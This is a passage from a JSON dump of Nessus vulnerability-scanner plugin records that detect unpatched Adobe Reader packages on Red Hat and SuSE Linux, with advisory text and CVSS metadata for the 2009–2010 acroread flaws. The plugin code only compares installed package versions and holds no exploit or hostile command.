audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"acroread-uninstall-9.3-3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:07:23", "description": "Updated acroread packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4 Extras.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes several vulnerabilities in Adobe Reader. These\nvulnerabilities are summarized on the Adobe Security Advisory\nAPSB10-02 page listed in the References section. A specially crafted\nPDF file could cause Adobe Reader to crash or, potentially, execute\narbitrary code as the user running Adobe Reader when opened.\n(CVE-2009-4324, CVE-2009-3953, CVE-2009-3954, CVE-2009-3955,\nCVE-2009-3959, CVE-2009-3956)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. All\nusers of Adobe Reader are advised to install these updated packages,\nwhich contain Adobe Reader version 9.3, which is not vulnerable to\nthese issues. All running instances of Adobe Reader must be restarted\nfor the update to take effect.", "edition": 24, "published": "2013-01-24T00:00:00", "title": "RHEL 4 : acroread (RHSA-2010:0038)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3953", "CVE-2009-3959", "CVE-2009-3955", "CVE-2009-4324", "CVE-2009-3954", "CVE-2009-3956"], "modified": "2013-01-24T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:4.8", "p-cpe:/a:redhat:enterprise_linux:acroread-plugin", "p-cpe:/a:redhat:enterprise_linux:acroread"], "id": "REDHAT-RHSA-2010-0038.NASL", "href": "https://www.tenable.com/plugins/nessus/63912", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0038. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63912);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n script_bugtraq_id(37331, 37758);\n script_xref(name:\"RHSA\", value:\"2010:0038\");\n\n script_name(english:\"RHEL 4 : acroread (RHSA-2010:0038)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated acroread packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4 Extras.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes several vulnerabilities in Adobe Reader. These\nvulnerabilities are summarized on the Adobe Security Advisory\nAPSB10-02 page listed in the References section. A specially crafted\nPDF file could cause Adobe Reader to crash or, potentially, execute\narbitrary code as the user running Adobe Reader when opened.\n(CVE-2009-4324, CVE-2009-3953, CVE-2009-3954, CVE-2009-3955,\nCVE-2009-3959, CVE-2009-3956)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. All\nusers of Adobe Reader are advised to install these updated packages,\nwhich contain Adobe Reader version 9.3, which is not vulnerable to\nthese issues. All running instances of Adobe Reader must be restarted\nfor the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.adobe.com/support/security/bulletins/apsb10-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2010-0038.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread and / or acroread-plugin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"acroread-9.3-1.el4\")) flag++;\nif (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"acroread-plugin-9.3-1.el4\")) flag++;\n\nif (rpm_check(release:\"RHEL4\", sp:\"8\", cpu:\"i386\", reference:\"acroread-9.3-1.el4\")) flag++;\nif (rpm_check(release:\"RHEL4\", sp:\"8\", cpu:\"i386\", reference:\"acroread-plugin-9.3-1.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:43:06", "description": "Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)", "edition": 24, "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 6805)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3953", "CVE-2009-3959", "CVE-2009-3955", "CVE-2009-3957", "CVE-2009-3958", "CVE-2009-4324", "CVE-2009-3954", "CVE-2009-3956"], "modified": "2011-01-27T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_ACROREAD_JA-6805.NASL", "href": "https://www.tenable.com/plugins/nessus/51711", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51711);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n\n script_name(english:\"SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 6805)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3957.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3958.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6805.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"acroread_ja-9.3-0.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:42:55", "description": "Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\n\nAcrobat reader was updated to version 9.3 to fix those security\nissues.", "edition": 24, "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : acroread (ZYPP Patch Number 6803)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3953", "CVE-2009-3959", "CVE-2009-3955", "CVE-2009-3957", "CVE-2009-3958", "CVE-2009-4324", "CVE-2009-3954", "CVE-2009-3956"], "modified": "2011-01-27T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_ACROREAD-6803.NASL", "href": "https://www.tenable.com/plugins/nessus/51696", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51696);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n\n script_name(english:\"SuSE 10 Security Update : acroread (ZYPP Patch Number 6803)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\n\nAcrobat reader was updated to version 9.3 to fix those security\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3957.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3958.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6803.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-9.3-0.6.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:43:05", "description": "Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)", "edition": 24, "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 6804)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3953", "CVE-2009-3959", "CVE-2009-3955", "CVE-2009-3957", "CVE-2009-3958", "CVE-2009-4324", "CVE-2009-3954", "CVE-2009-3956"], "modified": "2011-01-27T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_ACROREAD_JA-6804.NASL", "href": "https://www.tenable.com/plugins/nessus/51710", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51710);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n\n script_name(english:\"SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 6804)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3957.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3958.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6804.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread_ja-9.3-0.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:09:47", "description": "Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)", "edition": 24, "published": "2010-02-02T00:00:00", "title": "SuSE 11 Security Update : acroread_ja (SAT Patch Number 1881)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3953", "CVE-2009-3959", "CVE-2009-3955", "CVE-2009-3957", "CVE-2009-3958", "CVE-2009-4324", "CVE-2009-3954", "CVE-2009-3956"], "modified": "2010-02-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:acroread_ja", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_ACROREAD_JA-100128.NASL", "href": "https://www.tenable.com/plugins/nessus/44377", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44377);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n\n script_name(english:\"SuSE 11 Security Update : acroread_ja (SAT Patch Number 1881)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564742\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3957.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3958.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 1881.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread_ja\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security 